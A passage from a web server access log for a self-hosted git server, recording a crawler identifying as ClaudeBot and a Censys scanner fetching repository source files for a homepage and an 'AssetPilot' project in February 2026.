"/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10903] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 167.94.138.114] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[15/Feb/2026:13:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 167.94.138.114] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[15/Feb/2026:14:17:20 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css/style.css" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css/style.css" [Client 216.73.216.188] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15562] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 12683] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 11073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 12322] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js?display=source" [Client 216.73.216.188] [Length 22048] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:24 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/favicon.ico" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 10144] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css/style.css" [Client 216.73.216.188] [Length 12663] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" [Client 216.73.216.188] [Length 12806] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13161] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15556] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 13368] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js?display=rendered" [Client 216.73.216.188] [Length 11003] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14830] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 10009] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py?display=source" [Client 216.73.216.188] [Length 14293] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 13524] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py?display=source" [Client 216.73.216.188] [Length 16169] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10927] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14826] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14827] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" [Client 216.73.216.188] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13155] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13942] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14217] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 13076] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16488] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13892] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py?display=source" [Client 216.73.216.188] [Length 21544] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14673] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile?display=source" [Client 216.73.216.188] [Length 12464] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 16635] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:19:31 +0000] - 200 200 - GET https 